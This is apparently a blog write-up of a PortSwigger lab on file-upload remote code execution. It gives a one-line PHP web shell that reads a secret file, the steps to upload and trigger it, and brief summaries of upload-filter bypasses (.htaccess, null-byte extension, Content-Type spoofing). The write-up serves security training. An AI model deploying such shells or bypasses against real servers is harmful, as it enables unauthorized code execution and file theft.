On this page
apsyleg1 min read
#portswigger #file-upload #rce #web-security
Remote Code Execution via Web Shell Upload
Lab
Remote code execution via web shell upload · Apprentice
Solution
Given
This lab contains a vulnerable image upload function. It doesn't perform any
validation on the files users upload before storing them on the server's filesystem.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the
contents of the file /home/carlos/secret. Submit this secret using the button
provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Analysis and recon
Straightforward — upload a shell and call it in the browser.
<?php echo file_get_contents('/home/carlos/secret'); ?>
Log in, upload the shell.
Open /files/avatars/shell.php in the browser.
1bfoduHLVPomAxIanAVE6dzD1ulBhDVk
Lab solved!
More in this category
Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)
.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.
Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)
Extension blacklist rejects .php and a double-extension shell.php.jpg is served as an image — a null byte in shell.php%00.jpg bypasses both checks.
Web Shell Upload via Content-Type Restriction Bypass (PortSwigger Lab)
The server only checks the Content-Type header — flip it to image/jpeg and the PHP shell sails through.